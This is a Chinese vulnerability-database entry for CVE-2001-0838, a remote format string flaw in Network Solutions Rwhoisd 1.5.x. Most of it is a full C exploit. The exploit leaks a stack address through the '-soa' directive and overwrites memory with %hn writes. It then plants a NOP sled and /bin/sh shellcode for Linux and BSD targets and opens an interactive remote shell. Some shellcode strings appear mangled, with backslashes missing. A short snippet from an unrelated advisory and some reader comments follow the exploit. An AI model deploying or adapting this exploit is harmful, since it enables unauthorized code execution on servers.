Network Solutions Rwhoisd格式化字符串漏洞
| 漏洞ID | 1106303 | 漏洞类型 | 格式化字符串 |
| 发布时间 | 2001-04-17 | 更新时间 | 2001-12-06 |
![图片[1]-Network Solutions Rwhoisd格式化字符串漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2001-0838 |
![图片[2]-Network Solutions Rwhoisd格式化字符串漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200112-011 |
| 漏洞平台 | Unix | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
NetworkSolutionsRwhoisd1.5.x版本存在格式化字符串漏洞。远程攻击者借助-soa命令的格式化字符串说明符执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/3474/info
Rwhoisd is a publicly available RWHOIS server daemon for Unix based systems developed and maintained by Network Solutions Inc.
Rwhoisd contains a remotely exploitable format string vulnerability. It is possible to overwrite memory by if a client supplies malicious format specifiers as the argument to the '-soa' directive.
Attackers may be able to execute arbitrary code on affected hosts.
/*
17.4.2001
Remote Exploit for versions of
RWhoisd ... (by Network Solutions, Inc. V-1.5.x)
this code exploits a bug in the '-soa' directive
that calls print_error() with a user supplied
format string.
credit to rob who found the h0le
and mad thanks to all the people who helped me
test this code.
these versions are vulnerable on all platforms
not only the ones available here.
you better try more than once , for some reason
if sometimes fails on first attempts.
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY
have phun, CowPower.
*/
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define VERSION 2.0
#define MAX(x,y) ((x>y)?x:y)
#define PORT 4321
#define BUFF 251
#define LEN 1024
struct version {
char *name;
int ret;
int ret1;
int str;
};
struct version version[] = {
{ "Linux x86 (execpt Slack 8.x)",-185,-233,-5 } ,
{ "Linux x86 (Slackware 8.x)",56,-40,324 } ,
{ "FreeBSD (version < 4.x)",-189,-237,-5 } ,
{ "OpenBSD, FreeBSD 4.x",56,-40,324 } ,
0
};
/* modified shellcodes who contain no nasty control chars (<=0x20) */
char *evilcode[] = {
"x31xc0x31xdbx31xc9x43x41x41xb0x3fxcdx80"
"xebx25x5ex89xf3x83xc3xe0x89x73x28x31xc0x88x43x27x89x43"
"x2cx83xe8xf5x8dx4bx28x8dx53x2cx89xf3xcdx80x31xdbx89xd8"
"x40xcdx80xe8xd6xffxffxff/bin/sh" ,
"same as linux shellcode" ,
"x31xc0x2cxfex50xfexc8x50x50x2cxa7xcdx80"
"xebx2ax5ex8dx5exe0x89x73x2bx31xd2x89x53x27x89x53x2f"
"x89x53x34x88x53x39x31xc0xb0x3bx8dx4bx2bx80x6bx38x30"
"x80x6exfax30x51x51x56x50xebx48xe8xd1xffxffxff/bin/sh"
"xxxxxxxxxxxx" "x9a" "xxxx" "x37" "x" ,
"same as freebsd shellcode" ,
} ;
char *shellcode;
unsigned long int ret,mem;
int ver;
void *err(char *);
void *intr(void);
void *timeout(void);
int ok(void);
char *answer(char *,char *,int,int);
char *makeadd(unsigned long int,int,char *);
char *makebuf(int,char *,int);
main(int argc, char **argv) {
char sendln[LEN], recvln[LEN],*ptr;
int i,sockfd, maxfd, bsize;
struct sockaddr_in cli;
struct hostent *hp;
fd_set rset;
fprintf(stderr,"RWhoisd remote exploit v%.1f by Moo0n",VERSION);
maxfd = (sizeof(version) / sizeof(version[0])) - 2;
if (argc < 3) {
fprintf(stderr,"usage: %s <host> <version number>
ravailable support:n",argv[0]);
for (i=0;version[i].name;i++)
fprintf(stderr,"(%d)t%sn",i,version[i].name);
exit(-1);
}
for(i=0;argv[2][i];i++) if (!isdigit(argv[2][i]))
err("version not available.n");
ver = atoi(argv[2]);
if (!(ver <= maxfd)) err("version not available.n");
signal(SIGINT,(void *)intr);
signal(SIGALRM,(void *)timeout);
evilcode[1] = evilcode[0];
evilcode[3] = evilcode[2];
shellcode = evilcode[ver];
fprintf(stderr,"Target: %sn
Operating System: %sn",argv[1],version[ver].name);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("Socket");
exit(-1); }
if((hp = gethostbyname(argv[1])) == NULL){
printf("Error: %sn", hstrerror(h_errno));
exit(-1);
}
fputs("Connecting to RWhoisd....",stderr);
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(PORT);
memcpy((char *)&cli.sin_addr, hp->h_addr_list[0], hp->h_length);
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("");
exit(-1);
}
answer(0,recvln,sockfd,0);
for (i=0;i<8;i++) recvln[i] = tolower(recvln[i]);
if(strncmp(recvln,"%rwhois",7))
err("Connected,nBut its not RWhoisd, Aborting.n");
fputs("Connected.n",stderr);
sleep(1);
fputs("Building evil-string:n",stderr);
strcpy(sendln,"-soa %pn");
answer(sendln,recvln,sockfd,0);
if (strcmp(recvln,"%error 340 Invalid Authority Area"))
err("Cant read necessary data.n");
else {
answer(sendln,recvln,sockfd,1);
ptr = (char *)strstr(recvln,"0x") ;
if (!ptr) err("Data doesnt match verison given.n");
}
mem = strtoul(ptr,(void *)0,16);
ret = ((mem+version[ver].ret)&0xff)>0x20?(mem+version[ver].ret):
(mem+version[ver].ret1);
if (!ok()) err("Impossible Conditions, Aborting.n");
fprintf(stderr,"Assumed EIP Address: %#xn",ret);
answer(makebuf(BUFF,recvln,1),recvln,sockfd,1);
ptr = (char *)strstr(recvln,"78787800") ;
if(!ptr) err(0);
bsize = BUFF - (strlen(ptr) / 4) ;
mem += version[ver].str + bsize + 8 + (3*6) + (3*3);
fprintf(stderr,"Assumed shellcode address: %#xn",mem);
maxfd = ( strlen(recvln) - strlen(ptr) + 6 ) & 0xff ;
makebuf(bsize,sendln,0);
makeadd(mem,maxfd,recvln);
sendln[strlen(sendln)-1] = '�';
strcat(sendln,recvln);
answer(sendln,recvln,sockfd,1);
ptr = (char *)strstr(recvln,"xxx") ;
if (!ptr) err(0);
*((char *)strstr(ptr,"78787800")+8) = '�';
i = ((strlen(ptr)) & 0xff) - (mem & 0xff) ;
makebuf(bsize,sendln,1); makeadd(mem,maxfd+i,recvln);
sendln[strlen(sendln)-1] = '�';
strcat(sendln,recvln);
fputs("Sending evil-string , Waiting for Response....",stderr);
answer(sendln,recvln,sockfd,1);
answer("echo -n "oink";n",recvln,sockfd,0);
if (strcmp(recvln,"oink")) {
answer(0,recvln,sockfd,0);
if (strcmp(recvln,"oink")) err(0); }
fputs("Success!n",stderr);
strcpy(sendln,"uname -a;n");
write(sockfd,sendln,strlen(sendln));
sleep(1);
fputs(sendln,stderr);
signal(SIGINT,SIG_IGN);
bzero(sendln, LEN);
FD_ZERO(&rset);
for(;;){
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = MAX(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &rset)){
fgets(sendln, sizeof(sendln)-2, stdin);
write(sockfd, sendln, strlen(sendln));
bzero(sendln, LEN);
}
if(FD_ISSET(sockfd, &rset)){
bzero(recvln, LEN);
if(
(i = read(sockfd, recvln, sizeof(recvln)))== 0){
printf("hackerz.n");
exit(0);
}
if(i < 0){
perror("read");
exit(-1);
}
fputs(recvln, stdout);
}
}
}
char *makebuf(int len,char *buf,int real) {
char *buff,*ptr;
unsigned long addr;
int i;
bzero(buff = malloc(len),len);
for (i = 0; i < len-1; i+=2) strcat(buff,"%x");
if (real) addr = ret;
else addr = (mem & 0xff)>0x20?mem:mem+33;
ptr = buff;
*(ptr++) = (addr & 0xff) ;
*(ptr++) = (addr & 0xff00) >> 8 ;
*(ptr++) = (addr & 0xff0000) >> 16 ;
*(ptr++) = (addr & 0xff000000) >> 24 ;
memcpy(ptr,"AAAA",4);
ptr += 4;
i = 3;
while (i--) {
addr++;
*(ptr++) = (addr & 0xff) ;
*(ptr++) = (addr & 0xff00) >> 8 ;
*(ptr++) = (addr & 0xff0000) >> 16 ;
*(ptr++) = (addr & 0xff000000) >> 24 ;
}
sprintf(buf,"-soa xxx%sn",buff);
free(buff);
return(buf);
}
char *makeadd(unsigned long int mem,int us,char *add) {
char almog[400],sendln[100],*ptr;
int maxfd,goal;
goal = (mem & 0xff);
maxfd = (goal - us)<0?(goal+256-us):(goal-us);
sprintf(add,"%%.%dx%s",maxfd+8,"%hn");
us = goal+ 8;
goal = (mem & 0xff00) >> 8 ;
maxfd = (goal - us)<0?(goal+256-us):(goal-us);
sprintf(add,"%s%%.%dx%s",add,maxfd+8,"%hn");
memset(almog,'x90',300);
almog[300] = '�';
us = goal ;
goal = (mem & 0xff0000) >> 16 ;
maxfd = (goal - us)<0?(goal+256-us):(goal-us);
sprintf(sendln,"%%s%%.%ds",maxfd);
if (ver > 1) {
ptr = almog + (maxfd - strlen(shellcode));
memcpy(ptr,shellcode,strlen(shellcode));
}
sprintf(add,sendln,add,almog);
strcat(add,"%hn");
us = goal ;
goal = (mem & 0xff000000) >> 24 ;
maxfd = (goal - us)<0?(goal+256-us):(goal-us);
sprintf(sendln,"%%s%%.%ds",maxfd);
if (ver <= 1) {
ptr = almog + (maxfd - strlen(shellcode));
memcpy(ptr,shellcode,strlen(shellcode));
}
sprintf(add,sendln,add,almog);
strcat(add,"%hnn");
return(add);
}
char *answer(char *sendln,char *recvln,int sockfd,int extra) {
alarm(15);
if (sendln) write(sockfd,sendln,strlen(sendln));
if (extra) read(sockfd,recvln,LEN) ;
bzero(recvln, LEN);
read(sockfd,recvln,LEN) ;
alarm(0);
return(recvln);
}
void *intr(void) {
fflush(stdout);
fputs("nInterruption from keyboard...aborting.n",stderr);
exit(-1);
}
void *timeout(void) {
fputs("Timeout!n",stderr);
exit(-1);
}
int ok(void) {
if ( ((ret & 0xff) > 0x20)
&& (((ret & 0xff00) >> 8) > 0x20)
&& (((ret & 0xff0000) >> 16) > 0x20)
&& (((ret & 0xff000000) >> 24) > 0x20) ) return(1);
return(0);
}
void *err(char *msg) {
if (msg) fputs(msg,stderr);
else fputs("Failed.n",stderr);
exit(-1);
}
|受影响的产品
Network Solutions rwhoisd 1.5.X
|参考资料
来源:BUGTRAQ
名称:20011025RWhoisdremoteformatstringvulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100402652724815&w;=2
Linux权限提升漏洞 漏洞ID 1105256 漏洞类型 缓冲区溢出 发布时间 1996-08-13 更新时间 2000-02-03 CVE编号 CVE-2000-0218 CNNVD-ID CNNVD-200002-028 漏洞平台 Multiple CV…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666